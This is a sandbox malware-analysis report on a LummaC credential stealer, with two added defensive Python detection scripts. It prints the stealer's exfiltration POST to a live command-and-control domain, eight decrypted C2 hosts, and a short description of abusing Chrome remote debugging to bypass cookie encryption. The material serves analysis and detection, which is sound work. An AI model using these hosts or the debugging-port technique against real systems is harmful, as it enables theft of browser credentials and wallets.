Windows Analysis Report
Malware.zip

Overview

General Information

Sample name: Malware.zip
Analysis ID: 1634564
MD5: b48d83e332b091b2f8556ce414d02528
SHA1: 77ce378b412ffaaac214a1ac80fe491ef495d69c
SHA256: 3a44c0cf9db5c5130555a0d8e03893cf701e9145b98c0d469ca8b2b00d70fcd2

Detection

LummaC Stealer
Score: 76 (range 0 - 100)
Confidence: 100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
Yara detected LummaC Stealer
Found many strings related to Crypto-Wallets (likely being stolen)
Sample uses string decryption to hide its real strings
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Creates a process in suspended mode (likely to inject code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Browser Started with Remote Debugging
Suricata IDS alerts with low severity for network traffic
Yara detected Credential Stealer

Classification

  • System is w10x64_ra
  • rundll32.exe (PID: 3088 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • OpenWith.exe (PID: 6400 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: E4A834784FA08C17D47A1E72429C5109)
  • Setup.exe (PID: 6556 cmdline: "C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe" MD5: E1DF45DCA577E2C5941E714A0F9C32EC)
    • chrome.exe (PID: 6872 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --remote-debugging-port=9223 MD5: E81F54E6C1129887AEA47E7D092680BF)
      • chrome.exe (PID: 7160 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2380,i,11729313136857741515,7979103794442491089,262144 --variations-seed-version --mojo-platform-channel-handle=2548 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
No configs have been found
Yara matches (Source; Rule; Description; Author):
Source: 0000000A.00000002.2489986911.0000000003C7A000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_CredentialStealer; Description: Yara detected Credential Stealer; Author: Joe Security
Source: 0000000A.00000002.2480222478.0000000001329000.00000004.00000020.00020000.00000000.sdmp; Rule: JoeSecurity_LummaCStealer_4; Description: Yara detected LummaC Stealer; Author: Joe Security
Source: Process Memory Space: Setup.exe PID: 6556; Rule: JoeSecurity_CredentialStealer; Description: Yara detected Credential Stealer; Author: Joe Security
Sigma match (Browser Started with Remote Debugging)
  Source: Process started
  Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
  Data:
    Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --remote-debugging-port=9223
    CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --remote-debugging-port=9223
    CommandLine|base64offset|contains: ^"
    Image: C:\Program Files\Google\Chrome\Application\chrome.exe
    NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe
    OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe
    ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe"
    ParentImage: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe
    ParentProcessId: 6556
    ParentProcessName: Setup.exe
    ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --remote-debugging-port=9223
    ProcessId: 6872
    ProcessName: chrome.exe
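The Sigma hit above is the most actionable line in this report: Setup.exe, running from the Temp folder Explorer extracted Malware.zip into, started the user's own chrome.exe with --remote-debugging-port=9223. That switch exposes the DevTools protocol on localhost, and a process that can talk to it gets cookies and site data handed over by the browser itself, which is a known route around Application-Bound Encryption (the "Attempt to bypass Chrome Application-Bound Encryption" signature). The Python below is an added example, not Joe Sandbox or Sigma code, of the same process-creation check with the context a responder wants on top of the bare match: who started the browser, where that parent runs from, and which port was opened. The sample events are constructed from the PIDs and command lines visible in this report; the browser list, the suspicious-directory list and the severity scheme are assumptions.

```python
"""Flag Chromium-based browsers launched with a DevTools remote-debugging
switch, and rank each hit by who launched the browser and from where.

Added example for this report; the detection logic, browser list and
severity scheme are assumptions, not the Sigma rule's own code."""
import re
from dataclasses import dataclass

# Chromium-based browsers that honour --remote-debugging-port/--remote-debugging-pipe (assumed list).
CHROMIUM_BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe", "opera.exe", "vivaldi.exe"}
DEBUG_SWITCH = re.compile(r"--remote-debugging-(port|pipe)(?:=(\d+))?", re.IGNORECASE)
# Parent locations that should not be starting a debuggable browser (assumed list).
SUSPICIOUS_PARENT_DIRS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\", "\\downloads\\")


@dataclass(frozen=True)
class ProcessCreate:
    """Minimal process-creation event (the fields Sysmon EID 1 / Security 4688 provide)."""
    pid: int
    image: str
    cmdline: str
    ppid: int
    parent_image: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path ("C:\\x\\chrome.exe" -> "chrome.exe")."""
    return path.replace("/", "\\").rstrip("\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcessCreate):
    """Return a finding dict for a browser started with remote debugging, else None."""
    image = basename(ev.image)
    if image not in CHROMIUM_BROWSERS:
        return None
    match = DEBUG_SWITCH.search(ev.cmdline)
    if match is None:
        return None  # Chrome's own --type=... helper children do not carry the switch
    parent = basename(ev.parent_image)
    reasons = [f"{image} started with --remote-debugging-{match.group(1).lower()}"]
    severity = "low"  # a developer or a test harness may legitimately do this
    if parent not in CHROMIUM_BROWSERS:
        severity = "high"
        reasons.append(f"launched by a non-browser process: {parent}")
    if any(d in ev.parent_image.lower() for d in SUSPICIOUS_PARENT_DIRS):
        severity = "high"
        reasons.append("launching process runs from a temp/download directory")
    return {
        "pid": ev.pid,
        "ppid": ev.ppid,
        "parent": parent,
        "port": int(match.group(2)) if match.group(2) else None,
        "severity": severity,
        "reasons": reasons,
    }


def scan(events):
    """Run classify() over a stream of process-creation events and keep the hits."""
    return [hit for hit in (classify(e) for e in events) if hit is not None]


# Constructed sample: the first two events mirror PIDs 6556/6872/7160 in this report,
# the third is a benign browser self-relaunch added for contrast.
SAMPLE_EVENTS = [
    ProcessCreate(
        pid=6872,
        image=r"C:\Program Files\Google\Chrome\Application\chrome.exe",
        cmdline=r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --remote-debugging-port=9223',
        ppid=6556,
        parent_image=r"C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe",
    ),
    ProcessCreate(
        pid=7160,
        image=r"C:\Program Files\Google\Chrome\Application\chrome.exe",
        cmdline=r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US',
        ppid=6872,
        parent_image=r"C:\Program Files\Google\Chrome\Application\chrome.exe",
    ),
    ProcessCreate(
        pid=4242,
        image=r"C:\Program Files\Google\Chrome\Application\chrome.exe",
        cmdline=r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --user-data-dir=C:\dev\profile',
        ppid=1234,
        parent_image=r"C:\Program Files\Google\Chrome\Application\chrome.exe",
    ),
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

A developer starting Chrome from cmd.exe or a test runner also lands in "high" under this scheme; tune that with an allowlist of parent images rather than by dropping the check, because the parent-in-Temp condition is the part that separates this report's chain from a debugging session.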
Suricata alerts:
Timestamp                         SID      Severity  Classtype        Source              Destination         Protocol
2025-03-11T00:42:37.600801+0100   2028371  3         Unknown Traffic  192.168.2.16:49701  149.154.167.99:443  TCP
2025-03-11T00:42:39.657690+0100   2028371  3         Unknown Traffic  192.168.2.16:49702  104.21.11.150:443   TCP
2025-03-11T00:42:41.315049+0100   2028371  3         Unknown Traffic  192.168.2.16:49703  104.21.11.150:443   TCP

        AV Detection

Source: 0000000A.00000002.2480222478.0000000001329000.00000004.00000020.00020000.00000000.sdmp; String decryptor: restfulzpillow.bet/bWij
Source: 0000000A.00000002.2480222478.0000000001329000.00000004.00000020.00020000.00000000.sdmp; String decryptor: featureccus.shop/bdMAn
Source: 0000000A.00000002.2480222478.0000000001329000.00000004.00000020.00020000.00000000.sdmp; String decryptor: mrodularmall.top/aNzS
Source: 0000000A.00000002.2480222478.0000000001329000.00000004.00000020.00020000.00000000.sdmp; String decryptor: jowinjoinery.icu/bdWUa
Source: 0000000A.00000002.2480222478.0000000001329000.00000004.00000020.00020000.00000000.sdmp; String decryptor: legenassedk.top/bdpWO
Source: 0000000A.00000002.2480222478.0000000001329000.00000004.00000020.00020000.00000000.sdmp; String decryptor: htardwarehu.icu/Sbdsa
Source: 0000000A.00000002.2480222478.0000000001329000.00000004.00000020.00020000.00000000.sdmp; String decryptor: cjlaspcorne.icu/DbIps
Source: 0000000A.00000002.2480222478.0000000001329000.00000004.00000020.00020000.00000000.sdmp; String decryptor: bugildbett.top/bAuz
Source: unknown; HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.16:49701 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.21.11.150:443 -> 192.168.2.16:49703 version: TLS 1.2
Source: global traffic; HTTP traffic detected:
  GET /owowoowokk3j4 HTTP/1.1
  Connection: Keep-Alive
  Host: t.me
Source: Joe Sandbox View; IP Address: 149.154.167.99
Source: Joe Sandbox View; ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View; JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic; Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49703 -> 104.21.11.150:443
Source: Network traffic; Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49702 -> 104.21.11.150:443
Source: Network traffic; Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49701 -> 149.154.167.99:443
Source: unknown; TCP traffic detected without corresponding DNS query: 204.79.197.203 (listed 7 times)
Source: unknown; TCP traffic detected without corresponding DNS query: 52.182.143.211 (listed 7 times)
Source: unknown; TCP traffic detected without corresponding DNS query: 2.23.227.208 (listed once)
Source: unknown; TCP traffic detected without corresponding DNS query: 199.232.214.172 (listed twice)
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1 (listed 11 times)
Source: global traffic; HTTP traffic detected:
  GET /owowoowokk3j4 HTTP/1.1
  Connection: Keep-Alive
  Host: t.me
Source: global traffic; HTTP traffic detected:
  GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1
  Host: www.google.com
  Connection: keep-alive
  X-Client-Data: CLbgygE=
  Sec-Fetch-Site: none
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: empty
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  Accept-Encoding: gzip, deflate, br, zstd
  Accept-Language: en-US,en;q=0.9
Source: global traffic; HTTP traffic detected:
  GET /async/ddljson?async=ntp:2 HTTP/1.1
  Host: www.google.com
  Connection: keep-alive
  Sec-Fetch-Site: none
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: empty
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  Accept-Encoding: gzip, deflate, br, zstd
  Accept-Language: en-US,en;q=0.9
Source: global traffic; HTTP traffic detected:
  GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
  Host: www.google.com
  Connection: keep-alive
  X-Client-Data: CLbgygE=
  Sec-Fetch-Site: cross-site
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: empty
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  Accept-Encoding: gzip, deflate, br, zstd
  Accept-Language: en-US,en;q=0.9
Source: global traffic; HTTP traffic detected:
  GET /async/newtab_promos HTTP/1.1
  Host: www.google.com
  Connection: keep-alive
  Sec-Fetch-Site: cross-site
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: empty
  Sec-Fetch-Storage-Access: active
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  Accept-Encoding: gzip, deflate, br, zstd
  Accept-Language: en-US,en;q=0.9
Source: chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000D.00000003.1901191625.000069140159D000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1901318814.0000691400333000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: <!--_html_template_end_-->`}const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends CrLitElement{constructor(){super(...arguments);this.url={url:""}}static get is(){return"ntp-doodle-share-dialog"}static get styles(){return getCss$2()}render(){return getHtml$2.bind(this)()}static get properties(){return{title:{type:String},url:{type:Object}}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.fire("share",channel)}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);let instance$3=null;function getCss$1(){return instance$3||(instance$3=[...[getCss$4()],css`:host{--ntp-logo-height:168px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#doodle{position:relative}#shareButton{background-color:var(--color-new-tab-page-doodle-share-button-background,none);border:none;height:32px;min-width:32px;padding:0;position:absolute;width:32px;bottom:0}:host-context([dir=ltr]) #shareButton{right:-40px}:host-context([dir=rtl]) #shareButton{left:-40px}#shareButtonIcon{width:18px;height:18px;margin:7px;vertical-align:bottom;mask-image:url(chrome://new-tab-page/icons/share_unfilled.svg);background-color:var(--color-new-tab-page-doodle-share-button-i
Source: chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000D.00000002.2580424614.00006914009C4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2591961219.0000691400E7C000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000D.00000002.2596977075.0000691401070000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2580424614.00006914009C4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2607546412.0000691401500000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000D.00000002.2612827514.0000691401890000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2596792163.0000691401060000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000D.00000002.2607546412.0000691401500000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: www.youtube.com:443 equals www.youtube.com (Youtube)
Source: global traffic; DNS traffic detected: DNS query: t.me
Source: global traffic; DNS traffic detected: DNS query: restfulzpillow.bet
Source: global traffic; DNS traffic detected: DNS query: www.google.com
Source: global traffic; DNS traffic detected: DNS query: apis.google.com
Source: global traffic; DNS traffic detected: DNS query: play.google.com
Source: unknown; HTTP traffic detected:
  POST /bWij HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 41
  Host: restfulzpillow.bet
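The string decryptor produced eight host/path pairs, but the DNS and HTTP evidence shows only the first, restfulzpillow.bet, was resolved and then received a POST to exactly the decrypted path /bWij. Two other details in the same evidence are worth keeping: the GET to t.me carried no User-Agent header at all (the "HTTP GET or POST without a user agent" signature), and the POST's User-Agent claims Chrome/119 while the real chrome.exe on this host identified itself as Chrome/134 in its own requests. The Python below is an added example, not part of the Joe Sandbox report, that performs that correlation; the decryptor output, DNS queries and request heads are constructed from the lines above (request bodies are not available), and the split into "live" and "dormant" hosts is this example's own triage convention.

```python
"""Correlate the C2 candidates recovered by the string decryptor with the DNS
and HTTP evidence, to tell live infrastructure from dormant backups.

Added example for this report; the lists below are constructed from the
evidence lines in the report, and request bodies are not available."""
import re

# Eight host/path pairs from the "String decryptor" lines.
DECRYPTED_C2 = [
    "restfulzpillow.bet/bWij", "featureccus.shop/bdMAn", "mrodularmall.top/aNzS",
    "jowinjoinery.icu/bdWUa", "legenassedk.top/bdpWO", "htardwarehu.icu/Sbdsa",
    "cjlaspcorne.icu/DbIps", "bugildbett.top/bAuz",
]
# Hosts from the "DNS query" lines.
DNS_QUERIES = ["t.me", "restfulzpillow.bet", "www.google.com", "apis.google.com", "play.google.com"]
# Request heads reconstructed from the "HTTP traffic detected" lines (CRLFs re-inserted).
RAW_REQUESTS = [
    "GET /owowoowokk3j4 HTTP/1.1\r\nConnection: Keep-Alive\r\nHost: t.me\r\n\r\n",
    "POST /bWij HTTP/1.1\r\nConnection: Keep-Alive\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36\r\n"
    "Content-Length: 41\r\nHost: restfulzpillow.bet\r\n\r\n",
    "GET /async/ddljson?async=ntp:2 HTTP/1.1\r\nHost: www.google.com\r\nConnection: keep-alive\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36\r\n\r\n",
]
CHROME_MAJOR = re.compile(r"Chrome/(\d+)\.")


def parse_request(raw: str) -> dict:
    """Parse an HTTP/1.x request head into method, path, host and a lower-cased header map."""
    request_line, *header_lines = raw.strip().splitlines()
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "host": headers.get("host", "").lower(), "headers": headers}


def correlate(decrypted_c2, dns_queries, raw_requests):
    """For each decrypted C2 entry: was the host resolved, contacted, and on the decrypted path?"""
    requests = [parse_request(r) for r in raw_requests]
    resolved = {q.lower() for q in dns_queries}
    report = {}
    for entry in decrypted_c2:
        host, _, path = entry.partition("/")
        host = host.lower()
        hits = [r for r in requests if r["host"] == host]
        report[host] = {
            "resolved": host in resolved,
            "contacted": bool(hits),
            "path_match": any(r["path"] == "/" + path for r in hits),
            "methods": sorted({r["method"] for r in hits}),
        }
    return report


def hosts_without_user_agent(raw_requests):
    """Hosts that received a request with no User-Agent header at all."""
    return sorted({r["host"] for r in map(parse_request, raw_requests) if "user-agent" not in r["headers"]})


def claimed_chrome_major(raw_requests):
    """Chrome major version each host was told, to spot a hard-coded UA next to the real browser's."""
    out = {}
    for r in map(parse_request, raw_requests):
        m = CHROME_MAJOR.search(r["headers"].get("user-agent", ""))
        if m:
            out[r["host"]] = int(m.group(1))
    return out


def triage(decrypted_c2, dns_queries, raw_requests):
    """Split the decryptor output into hosts seen live in this run and dormant backups."""
    report = correlate(decrypted_c2, dns_queries, raw_requests)
    live = sorted(h for h, v in report.items() if v["contacted"])
    dormant = sorted(h for h, v in report.items() if not v["resolved"])
    return {"live": live, "dormant": dormant, "report": report}


if __name__ == "__main__":
    result = triage(DECRYPTED_C2, DNS_QUERIES, RAW_REQUESTS)
    print("live C2:", result["live"])
    print("dormant C2:", result["dormant"])
    print("no User-Agent:", hosts_without_user_agent(RAW_REQUESTS))
    print("Chrome versions claimed:", claimed_chrome_major(RAW_REQUESTS))
```

All eight hosts belong on a blocklist regardless of the split; the "live" set is the one to hunt for in proxy and DNS logs from before the sample was caught, and the "dormant" set is what the stealer falls back to once the first host is taken down. The hard-coded Chrome/119 User-Agent is a cheap proxy-side pivot when the real browser fleet is on a newer build.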
Source: chrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: http://clients2.google.com/time/1/current
Source: chrome.exe, 0000000D.00000002.2580424614.00006914009C4000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: http://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=134
Source: chrome.exe, 0000000D.00000002.2576136209.0000691400804000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: http://developer.chrome.com/docs/extensions/how-to/distribute/install-extensions)
Source: chrome.exe, 0000000D.00000002.2598698110.0000691401150000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: http://dns-tunnel-check.googlezip.net/connect
Source: chrome.exe, 0000000D.00000002.2562242297.000069140008E000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: http://google.com/
Source: chrome.exe, 0000000D.00000002.2537616209.000001B008EE7000.00000004.10000000.00040000.00000000.sdmp, chrome.exe, 0000000D.00000002.2614450632.0000691401940000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2565362454.00006914001B0000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUw
Source: chrome.exe, 0000000D.00000002.2591638099.0000691400E5C000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: http://unisolated.invalid/
Source: chromecache_69.14.dr; String found in binary or memory: http://www.broofa.com
Source: chrome.exe, 0000000D.00000002.2591961219.0000691400E7C000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: http://www.gstatic.com/generate_204
Source: chrome.exe, 0000000D.00000002.2493174113.000001B005E26000.00000002.00000001.00040000.0000000E.sdmp; String found in binary or memory: http://www.unicode.org/copyright.html
Source: chrome.exe, 0000000D.00000002.2591638099.0000691400E5C000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: https://ac.ecosia.org?q=
Source: chrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: https://accountcapabilities-pa.googleapis.com/
Source: chrome.exe, 0000000D.00000002.2561754247.0000691400038000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
Source: chrome.exe, 0000000D.00000002.2575961680.00006914007F0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2574197738.0000691400798000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2598698110.0000691401150000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2614629718.0000691401954000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: https://accounts.google.com
Source: chrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2614629718.0000691401954000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: https://accounts.google.com/
Source: chrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: https://accounts.google.com/AccountChooser
Source: chrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: https://accounts.google.com/AddSession
Source: chrome.exe, 0000000D.00000002.2566175437.00006914002AE000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
Source: chrome.exe, 0000000D.00000002.2566175437.00006914002AE000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
Source: chrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: https://accounts.google.com/Logout
Source: chrome.exe, 0000000D.00000003.1900222913.00006914004B4000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: https://accounts.google.com/Logout?source=ChromiumBrowser&continue=https://accounts.google.com/chrom
Source: chrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: https://accounts.google.com/RotateBoundCookies
Source: chrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: https://accounts.google.com/chrome/blank.html
Source: chrome.exe, 0000000D.00000002.2566175437.00006914002AE000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
Source: chrome.exe, 0000000D.00000002.2566175437.00006914002AE000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
Source: chrome.exe, 0000000D.00000002.2566175437.00006914002AE000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
Source: chrome.exe, 0000000D.00000002.2566175437.00006914002AE000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignup/chromeos
Source: chrome.exe, 0000000D.00000002.2566175437.00006914002AE000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
Source: chrome.exe, 0000000D.00000002.2566175437.00006914002AE000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: https://accounts.google.com/embedded/setup/windows
Source: chrome.exe, 0000000D.00000002.2566175437.00006914002AE000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
Source: chrome.exe, 0000000D.00000002.2566175437.00006914002AE000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
Source: chrome.exe, 0000000D.00000002.2562242297.0000691400068000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
Source: chrome.exe, 0000000D.00000002.2562242297.0000691400068000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxABata
Source: chromecache_67.14.dr; String found in binary or memory: https://accounts.google.com/o/oauth2/auth
Source: chromecache_67.14.dr; String found in binary or memory: https://accounts.google.com/o/oauth2/postmessageRelay
